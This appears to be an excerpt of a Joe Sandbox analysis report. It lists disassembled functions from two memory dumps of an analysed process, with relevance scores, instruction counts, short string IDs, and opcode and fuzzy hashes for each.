                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                                      • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                                      Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &#
                                                                                                                                                                                                                                                                                      • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                                      • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                                      • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                                      Function 024C1F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &#
                                                                                                                                                                                                                                                                                      • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                                      • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                                      • Instruction ID: e9cbaca9c4728d26de5190838a0e04f5b42803e8121f648c006889b47ec6351a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1A177B66042104BD768DB2DCC9267BB3E1EF91324F19892EED869B390E3F4D901C752
                                                                                                                                                                                                                                                                                      Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                                      • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                                      • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                                      Function 024BC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: de
                                                                                                                                                                                                                                                                                      • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                                      • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                                      • Instruction ID: fb76e698103ca9641ec9cec8879ee2b42d8999e7d381ba6384554f8e6907a449
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 919121719083118AC324DF68C8D27ABB7F2EFD1324F18992EE4D64B791E7788505C7A2
                                                                                                                                                                                                                                                                                      Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ~
                                                                                                                                                                                                                                                                                      • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                                      • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                                      • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                                                      Function 024BD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ~
                                                                                                                                                                                                                                                                                      • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                                      • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a6f2ea86ece29586c413c5c9cc3749fe809bcf846d24a8592aab4b765827bae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DA13972E042619FC725CE28CC906ABB7E1AF95324F19827EECA9973D1D7319806C7D1
                                                                                                                                                                                                                                                                                      Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: RpB
                                                                                                                                                                                                                                                                                      • API String ID: 0-664042118
                                                                                                                                                                                                                                                                                      • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                                      • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                                                      Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: d1
                                                                                                                                                                                                                                                                                      • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                                      • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                                                      Function 024B77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: c$
                                                                                                                                                                                                                                                                                      • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                                      • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                      • Instruction ID: 0445c2a5cbad396e7d72b25a3499ff526ebf231c6b3cee2b4dacbbd5a4108d0a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16918AB1100741CFD7658F25C4A07A3BBB1FF86318F15958DC4864FBA1E379A846CBA4
                                                                                                                                                                                                                                                                                      Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                                      • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                                      Function 024DD557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                                      • Instruction ID: fe9ebc888ba6e418e57204f9307b514bdb7e66bbc3f3f42efcfbe0d6bc7ace3a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB81C236A04201DFD714DF28C8A0A6BB7F2EF99714F19956DE5858B3A1DB31E841CB82
                                                                                                                                                                                                                                                                                      Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                                      Function 024CA637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction ID: e576a6ccdf3ba229831cc15060c5c880bfa0516e0810a2fc047305db2ac0082d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F71D53AB083698BD754CE2CC48031FBBE2ABC5714F29852EE49497391D335DC46CB82
                                                                                                                                                                                                                                                                                      Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: w
                                                                                                                                                                                                                                                                                      • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                      • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                                      Function 024DA9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: w
                                                                                                                                                                                                                                                                                      • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                      • Instruction ID: 52326965b738a86681bead27e7e8c2ebae39c22b6fa4354325b0d819d4e1e660
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF4116B6E116618FD704DFA4CD855AFBB72FB84315B0AC1A8C884BB319D77869078BD0
                                                                                                                                                                                                                                                                                      Function 024DCFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                                      • Instruction ID: ada4fa8266696152bd6f06a9962efed3ff57a173509ec6e7e4cf805886a2843f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE312431B04300EBE7118F249CA0B3BB7E4EBC6B1CF64492EE58593390D721E852CE56
                                                                                                                                                                                                                                                                                      Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
                                                                                                                                                                                                                                                                                      • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                                                      Function 024DD0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                                      • Instruction ID: 2bf85a2efe0c150d1c56f2f6aa9c15f92580cd41adb2fd868e2ee2b78dd674c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1310736B44301EBE7118B249CA1B3FF7E5EB8A718F244A2DE68497390D730E850CA56
                                                                                                                                                                                                                                                                                      Function 024C6739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: dB
                                                                                                                                                                                                                                                                                      • API String ID: 0-2104629891
                                                                                                                                                                                                                                                                                      • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                                      • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                                                      Function 004143C2 Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
